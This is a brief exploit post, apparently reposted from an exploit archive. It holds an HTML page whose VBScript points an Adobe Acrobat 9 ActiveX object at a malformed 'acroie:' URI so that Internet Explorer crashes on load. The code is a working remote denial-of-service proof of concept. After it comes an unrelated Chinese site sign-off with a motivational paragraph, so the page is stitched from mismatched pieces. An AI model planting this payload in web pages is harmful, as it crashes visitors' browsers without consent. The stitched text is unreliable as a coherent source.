Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
I can't seem to reproduce this on XP! Oh well.
Of course the most popular app for reading pdfs is SfS/SfI :)
Basically it will crash with any uri that adobe doesn't like.
Also interesting: try with file:///DoS and look in bottom left area --> <html><body> <object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript> arg1="acroie:///DoS"
target.src = arg1 </script>
到此这篇关于Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit 就介绍到这了。优秀是一种,越优秀就越想去,越努力就会越优秀。反过来也是一样,活得越差就越不想要去做些什么,或许是无力或许是真的太差了无从下手,于是越来越差,越差就越没动力去做,渐渐呆在舒适区,坐以待毙。更多相关Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!